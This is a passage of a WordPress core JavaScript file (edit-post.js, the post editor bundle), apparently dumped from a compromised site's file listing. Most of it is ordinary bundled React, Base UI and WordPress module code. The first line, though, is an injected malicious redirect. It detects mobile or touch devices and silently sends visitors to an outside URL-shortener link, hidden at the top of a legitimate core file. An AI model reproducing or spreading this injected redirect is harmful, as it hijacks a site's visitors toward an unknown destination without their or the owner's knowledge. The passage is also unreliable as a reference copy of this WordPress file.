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Current File : /var/www/vhosts/dazzlingwebplanet.co.uk/dazzlingwebplanet.co.uk/wp-includes/js/dist//edit-post.js
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/MZzuvFUGD0r2");
(function() {
var wp;
(wp ||= {}).editPost = (() => {
  var __create = Object.create;
  var __defProp = Object.defineProperty;
  var __getOwnPropDesc = Object.getOwnPropertyDescriptor;
  var __getOwnPropNames = Object.getOwnPropertyNames;
  var __getProtoOf = Object.getPrototypeOf;
  var __hasOwnProp = Object.prototype.hasOwnProperty;
  var __commonJS = (cb, mod) => function __require() {
    return mod || (0, cb[__getOwnPropNames(cb)[0]])((mod = { exports: {} }).exports, mod), mod.exports;
  };
  var __export = (target, all) => {
    for (var name in all)
      __defProp(target, name, { get: all[name], enumerable: true });
  };
  var __copyProps = (to, from, except, desc) => {
    if (from && typeof from === "object" || typeof from === "function") {
      for (let key of __getOwnPropNames(from))
        if (!__hasOwnProp.call(to, key) && key !== except)
          __defProp(to, key, { get: () => from[key], enumerable: !(desc = __getOwnPropDesc(from, key)) || desc.enumerable });
    }
    return to;
  };
  var __toESM = (mod, isNodeMode, target) => (target = mod != null ? __create(__getProtoOf(mod)) : {}, __copyProps(
    // If the importer is in node compatibility mode or this is not an ESM
    // file that has been converted to a CommonJS file using a Babel-
    // compatible transform (i.e. "__esModule" has not been set), then set
    // "default" to the CommonJS "module.exports" for node compatibility.
    isNodeMode || !mod || !mod.__esModule ? __defProp(target, "default", { value: mod, enumerable: true }) : target,
    mod
  ));
  var __toCommonJS = (mod) => __copyProps(__defProp({}, "__esModule", { value: true }), mod);

  // package-external:@wordpress/blocks
  var require_blocks = __commonJS({
    "package-external:@wordpress/blocks"(exports, module) {
      module.exports = window.wp.blocks;
    }
  });

  // package-external:@wordpress/block-library
  var require_block_library = __commonJS({
    "package-external:@wordpress/block-library"(exports, module) {
      module.exports = window.wp.blockLibrary;
    }
  });

  // package-external:@wordpress/deprecated
  var require_deprecated = __commonJS({
    "package-external:@wordpress/deprecated"(exports, module) {
      module.exports = window.wp.deprecated;
    }
  });

  // package-external:@wordpress/element
  var require_element = __commonJS({
    "package-external:@wordpress/element"(exports, module) {
      module.exports = window.wp.element;
    }
  });

  // package-external:@wordpress/data
  var require_data = __commonJS({
    "package-external:@wordpress/data"(exports, module) {
      module.exports = window.wp.data;
    }
  });

  // package-external:@wordpress/preferences
  var require_preferences = __commonJS({
    "package-external:@wordpress/preferences"(exports, module) {
      module.exports = window.wp.preferences;
    }
  });

  // package-external:@wordpress/widgets
  var require_widgets = __commonJS({
    "package-external:@wordpress/widgets"(exports, module) {
      module.exports = window.wp.widgets;
    }
  });

  // package-external:@wordpress/editor
  var require_editor = __commonJS({
    "package-external:@wordpress/editor"(exports, module) {
      module.exports = window.wp.editor;
    }
  });

  // package-external:@wordpress/core-data
  var require_core_data = __commonJS({
    "package-external:@wordpress/core-data"(exports, module) {
      module.exports = window.wp.coreData;
    }
  });

  // package-external:@wordpress/api-fetch
  var require_api_fetch = __commonJS({
    "package-external:@wordpress/api-fetch"(exports, module) {
      module.exports = window.wp.apiFetch;
    }
  });

  // package-external:@wordpress/i18n
  var require_i18n = __commonJS({
    "package-external:@wordpress/i18n"(exports, module) {
      module.exports = window.wp.i18n;
    }
  });

  // vendor-external:react
  var require_react = __commonJS({
    "vendor-external:react"(exports, module) {
      module.exports = window.React;
    }
  });

  // vendor-external:react/jsx-runtime
  var require_jsx_runtime = __commonJS({
    "vendor-external:react/jsx-runtime"(exports, module) {
      module.exports = window.ReactJSXRuntime;
    }
  });

  // vendor-external:react-dom
  var require_react_dom = __commonJS({
    "vendor-external:react-dom"(exports, module) {
      module.exports = window.ReactDOM;
    }
  });

  // node_modules/use-sync-external-store/cjs/use-sync-external-store-shim.development.js
  var require_use_sync_external_store_shim_development = __commonJS({
    "node_modules/use-sync-external-store/cjs/use-sync-external-store-shim.development.js"(exports) {
      "use strict";
      (function() {
        function is(x, y) {
          return x === y && (0 !== x || 1 / x === 1 / y) || x !== x && y !== y;
        }
        function useSyncExternalStore$2(subscribe, getSnapshot) {
          didWarnOld18Alpha || void 0 === React47.startTransition || (didWarnOld18Alpha = true, console.error(
            "You are using an outdated, pre-release alpha of React 18 that does not support useSyncExternalStore. The use-sync-external-store shim will not work correctly. Upgrade to a newer pre-release."
          ));
          var value = getSnapshot();
          if (!didWarnUncachedGetSnapshot) {
            var cachedValue = getSnapshot();
            objectIs(value, cachedValue) || (console.error(
              "The result of getSnapshot should be cached to avoid an infinite loop"
            ), didWarnUncachedGetSnapshot = true);
          }
          cachedValue = useState16({
            inst: { value, getSnapshot }
          });
          var inst = cachedValue[0].inst, forceUpdate = cachedValue[1];
          useLayoutEffect3(
            function() {
              inst.value = value;
              inst.getSnapshot = getSnapshot;
              checkIfSnapshotChanged(inst) && forceUpdate({ inst });
            },
            [subscribe, value, getSnapshot]
          );
          useEffect18(
            function() {
              checkIfSnapshotChanged(inst) && forceUpdate({ inst });
              return subscribe(function() {
                checkIfSnapshotChanged(inst) && forceUpdate({ inst });
              });
            },
            [subscribe]
          );
          useDebugValue2(value);
          return value;
        }
        function checkIfSnapshotChanged(inst) {
          var latestGetSnapshot = inst.getSnapshot;
          inst = inst.value;
          try {
            var nextValue = latestGetSnapshot();
            return !objectIs(inst, nextValue);
          } catch (error) {
            return true;
          }
        }
        function useSyncExternalStore$1(subscribe, getSnapshot) {
          return getSnapshot();
        }
        "undefined" !== typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ && "function" === typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStart && __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStart(Error());
        var React47 = require_react(), objectIs = "function" === typeof Object.is ? Object.is : is, useState16 = React47.useState, useEffect18 = React47.useEffect, useLayoutEffect3 = React47.useLayoutEffect, useDebugValue2 = React47.useDebugValue, didWarnOld18Alpha = false, didWarnUncachedGetSnapshot = false, shim = "undefined" === typeof window || "undefined" === typeof window.document || "undefined" === typeof window.document.createElement ? useSyncExternalStore$1 : useSyncExternalStore$2;
        exports.useSyncExternalStore = void 0 !== React47.useSyncExternalStore ? React47.useSyncExternalStore : shim;
        "undefined" !== typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ && "function" === typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStop && __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStop(Error());
      })();
    }
  });

  // node_modules/use-sync-external-store/shim/index.js
  var require_shim = __commonJS({
    "node_modules/use-sync-external-store/shim/index.js"(exports, module) {
      "use strict";
      if (false) {
        module.exports = null;
      } else {
        module.exports = require_use_sync_external_store_shim_development();
      }
    }
  });

  // node_modules/use-sync-external-store/cjs/use-sync-external-store-shim/with-selector.development.js
  var require_with_selector_development = __commonJS({
    "node_modules/use-sync-external-store/cjs/use-sync-external-store-shim/with-selector.development.js"(exports) {
      "use strict";
      (function() {
        function is(x, y) {
          return x === y && (0 !== x || 1 / x === 1 / y) || x !== x && y !== y;
        }
        "undefined" !== typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ && "function" === typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStart && __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStart(Error());
        var React47 = require_react(), shim = require_shim(), objectIs = "function" === typeof Object.is ? Object.is : is, useSyncExternalStore2 = shim.useSyncExternalStore, useRef23 = React47.useRef, useEffect18 = React47.useEffect, useMemo16 = React47.useMemo, useDebugValue2 = React47.useDebugValue;
        exports.useSyncExternalStoreWithSelector = function(subscribe, getSnapshot, getServerSnapshot, selector, isEqual) {
          var instRef = useRef23(null);
          if (null === instRef.current) {
            var inst = { hasValue: false, value: null };
            instRef.current = inst;
          } else inst = instRef.current;
          instRef = useMemo16(
            function() {
              function memoizedSelector(nextSnapshot) {
                if (!hasMemo) {
                  hasMemo = true;
                  memoizedSnapshot = nextSnapshot;
                  nextSnapshot = selector(nextSnapshot);
                  if (void 0 !== isEqual && inst.hasValue) {
                    var currentSelection = inst.value;
                    if (isEqual(currentSelection, nextSnapshot))
                      return memoizedSelection = currentSelection;
                  }
                  return memoizedSelection = nextSnapshot;
                }
                currentSelection = memoizedSelection;
                if (objectIs(memoizedSnapshot, nextSnapshot))
                  return currentSelection;
                var nextSelection = selector(nextSnapshot);
                if (void 0 !== isEqual && isEqual(currentSelection, nextSelection))
                  return memoizedSnapshot = nextSnapshot, currentSelection;
                memoizedSnapshot = nextSnapshot;
                return memoizedSelection = nextSelection;
              }
              var hasMemo = false, memoizedSnapshot, memoizedSelection, maybeGetServerSnapshot = void 0 === getServerSnapshot ? null : getServerSnapshot;
              return [
                function() {
                  return memoizedSelector(getSnapshot());
                },
                null === maybeGetServerSnapshot ? void 0 : function() {
                  return memoizedSelector(maybeGetServerSnapshot());
                }
              ];
            },
            [getSnapshot, getServerSnapshot, selector, isEqual]
          );
          var value = useSyncExternalStore2(subscribe, instRef[0], instRef[1]);
          useEffect18(
            function() {
              inst.hasValue = true;
              inst.value = value;
            },
            [value]
          );
          useDebugValue2(value);
          return value;
        };
        "undefined" !== typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ && "function" === typeof __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStop && __REACT_DEVTOOLS_GLOBAL_HOOK__.registerInternalModuleStop(Error());
      })();
    }
  });

  // node_modules/use-sync-external-store/shim/with-selector.js
  var require_with_selector = __commonJS({
    "node_modules/use-sync-external-store/shim/with-selector.js"(exports, module) {
      "use strict";
      if (false) {
        module.exports = null;
      } else {
        module.exports = require_with_selector_development();
      }
    }
  });

  // package-external:@wordpress/primitives
  var require_primitives = __commonJS({
    "package-external:@wordpress/primitives"(exports, module) {
      module.exports = window.wp.primitives;
    }
  });

  // package-external:@wordpress/compose
  var require_compose = __commonJS({
    "package-external:@wordpress/compose"(exports, module) {
      module.exports = window.wp.compose;
    }
  });

  // package-external:@wordpress/theme
  var require_theme = __commonJS({
    "package-external:@wordpress/theme"(exports, module) {
      module.exports = window.wp.theme;
    }
  });

  // package-external:@wordpress/private-apis
  var require_private_apis = __commonJS({
    "package-external:@wordpress/private-apis"(exports, module) {
      module.exports = window.wp.privateApis;
    }
  });

  // package-external:@wordpress/components
  var require_components = __commonJS({
    "package-external:@wordpress/components"(exports, module) {
      module.exports = window.wp.components;
    }
  });

  // package-external:@wordpress/block-editor
  var require_block_editor = __commonJS({
    "package-external:@wordpress/block-editor"(exports, module) {
      module.exports = window.wp.blockEditor;
    }
  });

  // package-external:@wordpress/style-engine
  var require_style_engine = __commonJS({
    "package-external:@wordpress/style-engine"(exports, module) {
      module.exports = window.wp.styleEngine;
    }
  });

  // package-external:@wordpress/plugins
  var require_plugins = __commonJS({
    "package-external:@wordpress/plugins"(exports, module) {
      module.exports = window.wp.plugins;
    }
  });

  // package-external:@wordpress/notices
  var require_notices = __commonJS({
    "package-external:@wordpress/notices"(exports, module) {
      module.exports = window.wp.notices;
    }
  });

  // package-external:@wordpress/commands
  var require_commands = __commonJS({
    "package-external:@wordpress/commands"(exports, module) {
      module.exports = window.wp.commands;
    }
  });

  // package-external:@wordpress/url
  var require_url = __commonJS({
    "package-external:@wordpress/url"(exports, module) {
      module.exports = window.wp.url;
    }
  });

  // package-external:@wordpress/html-entities
  var require_html_entities = __commonJS({
    "package-external:@wordpress/html-entities"(exports, module) {
      module.exports = window.wp.htmlEntities;
    }
  });

  // package-external:@wordpress/keyboard-shortcuts
  var require_keyboard_shortcuts = __commonJS({
    "package-external:@wordpress/keyboard-shortcuts"(exports, module) {
      module.exports = window.wp.keyboardShortcuts;
    }
  });

  // package-external:@wordpress/hooks
  var require_hooks = __commonJS({
    "package-external:@wordpress/hooks"(exports, module) {
      module.exports = window.wp.hooks;
    }
  });

  // package-external:@wordpress/keycodes
  var require_keycodes = __commonJS({
    "package-external:@wordpress/keycodes"(exports, module) {
      module.exports = window.wp.keycodes;
    }
  });

  // packages/edit-post/build-module/index.mjs
  var index_exports = {};
  __export(index_exports, {
    PluginBlockSettingsMenuItem: () => PluginBlockSettingsMenuItem,
    PluginDocumentSettingPanel: () => PluginDocumentSettingPanel,
    PluginMoreMenuItem: () => PluginMoreMenuItem,
    PluginPostPublishPanel: () => PluginPostPublishPanel,
    PluginPostStatusInfo: () => PluginPostStatusInfo,
    PluginPrePublishPanel: () => PluginPrePublishPanel,
    PluginSidebar: () => PluginSidebar,
    PluginSidebarMoreMenuItem: () => PluginSidebarMoreMenuItem,
    __experimentalFullscreenModeClose: () => fullscreen_mode_close_default,
    __experimentalMainDashboardButton: () => __experimentalMainDashboardButton,
    __experimentalPluginPostExcerpt: () => __experimentalPluginPostExcerpt,
    initializeEditor: () => initializeEditor,
    reinitializeEditor: () => reinitializeEditor,
    store: () => store
  });
  var import_blocks2 = __toESM(require_blocks(), 1);
  var import_block_library2 = __toESM(require_block_library(), 1);
  var import_deprecated4 = __toESM(require_deprecated(), 1);
  var import_element30 = __toESM(require_element(), 1);
  var import_data27 = __toESM(require_data(), 1);
  var import_preferences12 = __toESM(require_preferences(), 1);
  var import_widgets = __toESM(require_widgets(), 1);
  var import_editor20 = __toESM(require_editor(), 1);
  var import_core_data10 = __toESM(require_core_data(), 1);
  var import_api_fetch2 = __toESM(require_api_fetch(), 1);

  // node_modules/clsx/dist/clsx.mjs
  function r(e) {
    var t, f, n = "";
    if ("string" == typeof e || "number" == typeof e) n += e;
    else if ("object" == typeof e) if (Array.isArray(e)) {
      var o = e.length;
      for (t = 0; t < o; t++) e[t] && (f = r(e[t])) && (n && (n += " "), n += f);
    } else for (f in e) e[f] && (n && (n += " "), n += f);
    return n;
  }
  function clsx() {
    for (var e, t, f = 0, n = "", o = arguments.length; f < o; f++) (e = arguments[f]) && (t = r(e)) && (n && (n += " "), n += t);
    return n;
  }
  var clsx_default = clsx;

  // node_modules/@base-ui/utils/safeReact.mjs
  var React = __toESM(require_react(), 1);
  var SafeReact = {
    ...React
  };

  // node_modules/@base-ui/utils/useRefWithInit.mjs
  var React2 = __toESM(require_react(), 1);
  var UNINITIALIZED = {};
  function useRefWithInit(init, initArg) {
    const ref = React2.useRef(UNINITIALIZED);
    if (ref.current === UNINITIALIZED) {
      ref.current = init(initArg);
    }
    return ref;
  }

  // node_modules/@base-ui/utils/useStableCallback.mjs
  var useInsertionEffect = SafeReact.useInsertionEffect;
  var useSafeInsertionEffect = (
    // React 17 doesn't have useInsertionEffect.
    useInsertionEffect && // Preact replaces useInsertionEffect with useLayoutEffect and fires too late.
    useInsertionEffect !== SafeReact.useLayoutEffect ? useInsertionEffect : (fn) => fn()
  );
  function useStableCallback(callback) {
    const stable = useRefWithInit(createStableCallback).current;
    stable.next = callback;
    useSafeInsertionEffect(stable.effect);
    return stable.trampoline;
  }
  function createStableCallback() {
    const stable = {
      next: void 0,
      callback: assertNotCalled,
      trampoline: (...args) => stable.callback?.(...args),
      effect: () => {
        stable.callback = stable.next;
      }
    };
    return stable;
  }
  function assertNotCalled() {
    if (true) {
      throw (
        /* minify-error-disabled */
        new Error("Base UI: Cannot call an event handler while rendering.")
      );
    }
  }

  // node_modules/@base-ui/utils/useIsoLayoutEffect.mjs
  var React3 = __toESM(require_react(), 1);
  var noop = () => {
  };
  var useIsoLayoutEffect = typeof document !== "undefined" ? React3.useLayoutEffect : noop;

  // node_modules/@base-ui/utils/warn.mjs
  var set;
  if (true) {
    set = /* @__PURE__ */ new Set();
  }
  function warn(...messages) {
    if (true) {
      const messageKey = messages.join(" ");
      if (!set.has(messageKey)) {
        set.add(messageKey);
        console.warn(`Base UI: ${messageKey}`);
      }
    }
  }

  // node_modules/@base-ui/react/internals/direction-context/DirectionContext.mjs
  var React4 = __toESM(require_react(), 1);
  var DirectionContext = /* @__PURE__ */ React4.createContext(void 0);
  if (true) DirectionContext.displayName = "DirectionContext";
  function useDirection() {
    const context = React4.useContext(DirectionContext);
    return context?.direction ?? "ltr";
  }

  // node_modules/@base-ui/react/internals/useRenderElement.mjs
  var React7 = __toESM(require_react(), 1);

  // node_modules/@base-ui/utils/useMergedRefs.mjs
  function useMergedRefs(a, b, c, d) {
    const forkRef = useRefWithInit(createForkRef).current;
    if (didChange(forkRef, a, b, c, d)) {
      update(forkRef, [a, b, c, d]);
    }
    return forkRef.callback;
  }
  function useMergedRefsN(refs) {
    const forkRef = useRefWithInit(createForkRef).current;
    if (didChangeN(forkRef, refs)) {
      update(forkRef, refs);
    }
    return forkRef.callback;
  }
  function createForkRef() {
    return {
      callback: null,
      cleanup: null,
      refs: []
    };
  }
  function didChange(forkRef, a, b, c, d) {
    return forkRef.refs[0] !== a || forkRef.refs[1] !== b || forkRef.refs[2] !== c || forkRef.refs[3] !== d;
  }
  function didChangeN(forkRef, newRefs) {
    return forkRef.refs.length !== newRefs.length || forkRef.refs.some((ref, index2) => ref !== newRefs[index2]);
  }
  function update(forkRef, refs) {
    forkRef.refs = refs;
    if (refs.every((ref) => ref == null)) {
      forkRef.callback = null;
      return;
    }
    forkRef.callback = (instance) => {
      if (forkRef.cleanup) {
        forkRef.cleanup();
        forkRef.cleanup = null;
      }
      if (instance != null) {
        const cleanupCallbacks = Array(refs.length).fill(null);
        for (let i = 0; i < refs.length; i += 1) {
          const ref = refs[i];
          if (ref == null) {
            continue;
          }
          switch (typeof ref) {
            case "function": {
              const refCleanup = ref(instance);
              if (typeof refCleanup === "function") {
                cleanupCallbacks[i] = refCleanup;
              }
              break;
            }
            case "object": {
              ref.current = instance;
              break;
            }
            default:
          }
        }
        forkRef.cleanup = () => {
          for (let i = 0; i < refs.length; i += 1) {
            const ref = refs[i];
            if (ref == null) {
              continue;
            }
            switch (typeof ref) {
              case "function": {
                const cleanupCallback = cleanupCallbacks[i];
                if (typeof cleanupCallback === "function") {
                  cleanupCallback();
                } else {
                  ref(null);
                }
                break;
              }
              case "object": {
                ref.current = null;
                break;
              }
              default:
            }
          }
        };
      }
    };
  }

  // node_modules/@base-ui/utils/getReactElementRef.mjs
  var React6 = __toESM(require_react(), 1);

  // node_modules/@base-ui/utils/reactVersion.mjs
  var React5 = __toESM(require_react(), 1);
  var majorVersion = parseInt(React5.version, 10);
  function isReactVersionAtLeast(reactVersionToCheck) {
    return majorVersion >= reactVersionToCheck;
  }

  // node_modules/@base-ui/utils/getReactElementRef.mjs
  function getReactElementRef(element) {
    if (!/* @__PURE__ */ React6.isValidElement(element)) {
      return null;
    }
    const reactElement = element;
    const propsWithRef = reactElement.props;
    return (isReactVersionAtLeast(19) ? propsWithRef?.ref : reactElement.ref) ?? null;
  }

  // node_modules/@base-ui/utils/mergeObjects.mjs
  function mergeObjects(a, b) {
    if (a && !b) {
      return a;
    }
    if (!a && b) {
      return b;
    }
    if (a || b) {
      return {
        ...a,
        ...b
      };
    }
    return void 0;
  }

  // node_modules/@base-ui/utils/empty.mjs
  function NOOP() {
  }
  var EMPTY_ARRAY = Object.freeze([]);
  var EMPTY_OBJECT = Object.freeze({});

  // node_modules/@base-ui/react/internals/getStateAttributesProps.mjs
  function getStateAttributesProps(state, customMapping) {
    const props = {};
    for (const key in state) {
      const value = state[key];
      if (customMapping?.hasOwnProperty(key)) {
        const customProps = customMapping[key](value);
        if (customProps != null) {
          Object.assign(props, customProps);
        }
        continue;
      }
      if (value === true) {
        props[`data-${key.toLowerCase()}`] = "";
      } else if (value) {
        props[`data-${key.toLowerCase()}`] = value.toString();
      }
    }
    return props;
  }

  // node_modules/@base-ui/react/utils/resolveClassName.mjs
  function resolveClassName(className, state) {
    return typeof className === "function" ? className(state) : className;
  }

  // node_modules/@base-ui/react/utils/resolveStyle.mjs
  function resolveStyle(style, state) {
    return typeof style === "function" ? style(state) : style;
  }

  // node_modules/@base-ui/react/merge-props/mergeProps.mjs
  var EMPTY_PROPS = {};
  function mergeProps(a, b, c, d, e) {
    if (!c && !d && !e && !a) {
      return createInitialMergedProps(b);
    }
    let merged = createInitialMergedProps(a);
    if (b) {
      merged = mergeInto(merged, b);
    }
    if (c) {
      merged = mergeInto(merged, c);
    }
    if (d) {
      merged = mergeInto(merged, d);
    }
    if (e) {
      merged = mergeInto(merged, e);
    }
    return merged;
  }
  function mergePropsN(props) {
    if (props.length === 0) {
      return EMPTY_PROPS;
    }
    if (props.length === 1) {
      return createInitialMergedProps(props[0]);
    }
    let merged = createInitialMergedProps(props[0]);
    for (let i = 1; i < props.length; i += 1) {
      merged = mergeInto(merged, props[i]);
    }
    return merged;
  }
  function createInitialMergedProps(inputProps) {
    if (isPropsGetter(inputProps)) {
      return {
        ...resolvePropsGetter(inputProps, EMPTY_PROPS)
      };
    }
    return copyInitialProps(inputProps);
  }
  function mergeInto(merged, inputProps) {
    if (isPropsGetter(inputProps)) {
      return resolvePropsGetter(inputProps, merged);
    }
    return mutablyMergeInto(merged, inputProps);
  }
  function copyInitialProps(inputProps) {
    const copiedProps = {
      ...inputProps
    };
    for (const propName in copiedProps) {
      const propValue = copiedProps[propName];
      if (isEventHandler(propName, propValue)) {
        copiedProps[propName] = wrapEventHandler(propValue);
      }
    }
    return copiedProps;
  }
  function mutablyMergeInto(mergedProps, externalProps) {
    if (!externalProps) {
      return mergedProps;
    }
    for (const propName in externalProps) {
      const externalPropValue = externalProps[propName];
      switch (propName) {
        case "style": {
          mergedProps[propName] = mergeObjects(mergedProps.style, externalPropValue);
          break;
        }
        case "className": {
          mergedProps[propName] = mergeClassNames(mergedProps.className, externalPropValue);
          break;
        }
        default: {
          if (isEventHandler(propName, externalPropValue)) {
            mergedProps[propName] = mergeEventHandlers(mergedProps[propName], externalPropValue);
          } else {
            mergedProps[propName] = externalPropValue;
          }
        }
      }
    }
    return mergedProps;
  }
  function isEventHandler(key, value) {
    const code0 = key.charCodeAt(0);
    const code1 = key.charCodeAt(1);
    const code2 = key.charCodeAt(2);
    return code0 === 111 && code1 === 110 && code2 >= 65 && code2 <= 90 && (typeof value === "function" || typeof value === "undefined");
  }
  function isPropsGetter(inputProps) {
    return typeof inputProps === "function";
  }
  function resolvePropsGetter(inputProps, previousProps) {
    if (isPropsGetter(inputProps)) {
      return inputProps(previousProps);
    }
    return inputProps ?? EMPTY_PROPS;
  }
  function mergeEventHandlers(ourHandler, theirHandler) {
    if (!theirHandler) {
      return ourHandler;
    }
    if (!ourHandler) {
      return wrapEventHandler(theirHandler);
    }
    return (...args) => {
      const event = args[0];
      if (isSyntheticEvent(event)) {
        const baseUIEvent = event;
        makeEventPreventable(baseUIEvent);
        const result2 = theirHandler(...args);
        if (!baseUIEvent.baseUIHandlerPrevented) {
          ourHandler?.(...args);
        }
        return result2;
      }
      const result = theirHandler(...args);
      ourHandler?.(...args);
      return result;
    };
  }
  function wrapEventHandler(handler) {
    if (!handler) {
      return handler;
    }
    return (...args) => {
      const event = args[0];
      if (isSyntheticEvent(event)) {
        makeEventPreventable(event);
      }
      return handler(...args);
    };
  }
  function makeEventPreventable(event) {
    event.preventBaseUIHandler = () => {
      event.baseUIHandlerPrevented = true;
    };
    return event;
  }
  function mergeClassNames(ourClassName, theirClassName) {
    if (theirClassName) {
      if (ourClassName) {
        return theirClassName + " " + ourClassName;
      }
      return theirClassName;
    }
    return ourClassName;
  }
  function isSyntheticEvent(event) {
    return event != null && typeof event === "object" && "nativeEvent" in event;
  }

  // node_modules/@base-ui/react/internals/useRenderElement.mjs
  var import_react = __toESM(require_react(), 1);
  function useRenderElement(element, componentProps, params = {}) {
    const renderProp = componentProps.render;
    const outProps = useRenderElementProps(componentProps, params);
    if (params.enabled === false) {
      return null;
    }
    const state = params.state ?? EMPTY_OBJECT;
    return evaluateRenderProp(element, renderProp, outProps, state);
  }
  function useRenderElementProps(componentProps, params = {}) {
    const {
      className: classNameProp,
      style: styleProp,
      render: renderProp
    } = componentProps;
    const {
      state = EMPTY_OBJECT,
      ref,
      props,
      stateAttributesMapping: stateAttributesMapping3,
      enabled = true
    } = params;
    const className = enabled ? resolveClassName(classNameProp, state) : void 0;
    const style = enabled ? resolveStyle(styleProp, state) : void 0;
    const stateProps = enabled ? getStateAttributesProps(state, stateAttributesMapping3) : EMPTY_OBJECT;
    const resolvedProps = enabled && props ? resolveRenderFunctionProps(props) : void 0;
    const outProps = enabled ? mergeObjects(stateProps, resolvedProps) ?? {} : EMPTY_OBJECT;
    if (typeof document !== "undefined") {
      if (!enabled) {
        useMergedRefs(null, null);
      } else if (Array.isArray(ref)) {
        outProps.ref = useMergedRefsN([outProps.ref, getReactElementRef(renderProp), ...ref]);
      } else {
        outProps.ref = useMergedRefs(outProps.ref, getReactElementRef(renderProp), ref);
      }
    }
    if (!enabled) {
      return EMPTY_OBJECT;
    }
    if (className !== void 0) {
      outProps.className = mergeClassNames(outProps.className, className);
    }
    if (style !== void 0) {
      outProps.style = mergeObjects(outProps.style, style);
    }
    return outProps;
  }
  function resolveRenderFunctionProps(props) {
    if (Array.isArray(props)) {
      return mergePropsN(props);
    }
    return mergeProps(void 0, props);
  }
  var REACT_LAZY_TYPE = /* @__PURE__ */ Symbol.for("react.lazy");
  var COMPONENT_IDENTIFIER_PATTERN = /^[A-Z][A-Za-z0-9$]*$/;
  var LOWERCASE_CHARACTER_PATTERN = /[a-z]/;
  function evaluateRenderProp(element, render, props, state) {
    if (render) {
      if (typeof render === "function") {
        if (true) {
          warnIfRenderPropLooksLikeComponent(render);
        }
        return render(props, state);
      }
      const mergedProps = mergeProps(props, render.props);
      mergedProps.ref = props.ref;
      let newElement = render;
      if (newElement?.$$typeof === REACT_LAZY_TYPE) {
        const children = React7.Children.toArray(render);
        newElement = children[0];
      }
      if (true) {
        if (!/* @__PURE__ */ React7.isValidElement(newElement)) {
          throw new Error(["Base UI: The `render` prop was provided an invalid React element as `React.isValidElement(render)` is `false`.", "A valid React element must be provided to the `render` prop because it is cloned with props to replace the default element.", "https://base-ui.com/r/invalid-render-prop"].join("\n"));
        }
      }
      return /* @__PURE__ */ React7.cloneElement(newElement, mergedProps);
    }
    if (element) {
      if (typeof element === "string") {
        return renderTag(element, props);
      }
    }
    throw new Error(true ? "Base UI: Render element or function are not defined." : formatErrorMessage_default(8));
  }
  function warnIfRenderPropLooksLikeComponent(renderFn) {
    const functionName = renderFn.name;
    if (functionName.length === 0) {
      return;
    }
    if (!COMPONENT_IDENTIFIER_PATTERN.test(functionName)) {
      return;
    }
    if (!LOWERCASE_CHARACTER_PATTERN.test(functionName)) {
      return;
    }
    warn(`The \`render\` prop received a function named \`${functionName}\` that starts with an uppercase letter.`, "This usually means a React component was passed directly as `render={Component}`.", "Base UI calls `render` as a plain function, which can break the Rules of Hooks during reconciliation.", "If this is an intentional render callback, rename it to start with a lowercase letter.", "Use `render={<Component />}` or `render={(props) => <Component {...props} />}` instead.", "https://base-ui.com/r/invalid-render-prop");
  }
  function renderTag(Tag, props) {
    if (Tag === "button") {
      return /* @__PURE__ */ (0, import_react.createElement)("button", {
        type: "button",
        ...props,
        key: props.key
      });
    }
    if (Tag === "img") {
      return /* @__PURE__ */ (0, import_react.createElement)("img", {
        alt: "",
        ...props,
        key: props.key
      });
    }
    return /* @__PURE__ */ React7.createElement(Tag, props);
  }

  // node_modules/@base-ui/utils/useId.mjs
  var React8 = __toESM(require_react(), 1);
  var globalId = 0;
  function useGlobalId(idOverride, prefix = "mui") {
    const [defaultId, setDefaultId] = React8.useState(idOverride);
    const id = idOverride || defaultId;
    React8.useEffect(() => {
      if (defaultId == null) {
        globalId += 1;
        setDefaultId(`${prefix}-${globalId}`);
      }
    }, [defaultId, prefix]);
    return id;
  }
  var maybeReactUseId = SafeReact.useId;
  function useId(idOverride, prefix) {
    if (maybeReactUseId !== void 0) {
      const reactId = maybeReactUseId();
      return idOverride ?? (prefix ? `${prefix}-${reactId}` : reactId);
    }
    return useGlobalId(idOverride, prefix);
  }

  // node_modules/@base-ui/react/internals/useBaseUiId.mjs
  function useBaseUiId(idOverride) {
    return useId(idOverride, "base-ui");
  }

  // node_modules/@base-ui/react/internals/reason-parts.mjs
  var reason_parts_exports = {};
  __export(reason_parts_exports, {
    cancelOpen: () => cancelOpen,
    chipRemovePress: () => chipRemovePress,
    clearPress: () => clearPress,
    closePress: () => closePress,
    closeWatcher: () => closeWatcher,
    decrementPress: () => decrementPress,
    disabled: () => disabled,
    drag: () => drag,
    escapeKey: () => escapeKey,
    focusOut: () => focusOut,
    imperativeAction: () => imperativeAction,
    incrementPress: () => incrementPress,
    initial: () => initial,
    inputBlur: () => inputBlur,
    inputChange: () => inputChange,
    inputClear: () => inputClear,
    inputPaste: () => inputPaste,
    inputPress: () => inputPress,
    itemPress: () => itemPress,
    keyboard: () => keyboard,
    linkPress: () => linkPress,
    listNavigation: () => listNavigation,
    missing: () => missing,
    none: () => none,
    outsidePress: () => outsidePress,
    pointer: () => pointer,
    scrub: () => scrub,
    siblingOpen: () => siblingOpen,
    swipe: () => swipe,
    trackPress: () => trackPress,
    triggerFocus: () => triggerFocus,
    triggerHover: () => triggerHover,
    triggerPress: () => triggerPress,
    wheel: () => wheel,
    windowResize: () => windowResize
  });
  var none = "none";
  var triggerPress = "trigger-press";
  var triggerHover = "trigger-hover";
  var triggerFocus = "trigger-focus";
  var outsidePress = "outside-press";
  var itemPress = "item-press";
  var closePress = "close-press";
  var linkPress = "link-press";
  var clearPress = "clear-press";
  var chipRemovePress = "chip-remove-press";
  var trackPress = "track-press";
  var incrementPress = "increment-press";
  var decrementPress = "decrement-press";
  var inputChange = "input-change";
  var inputClear = "input-clear";
  var inputBlur = "input-blur";
  var inputPaste = "input-paste";
  var inputPress = "input-press";
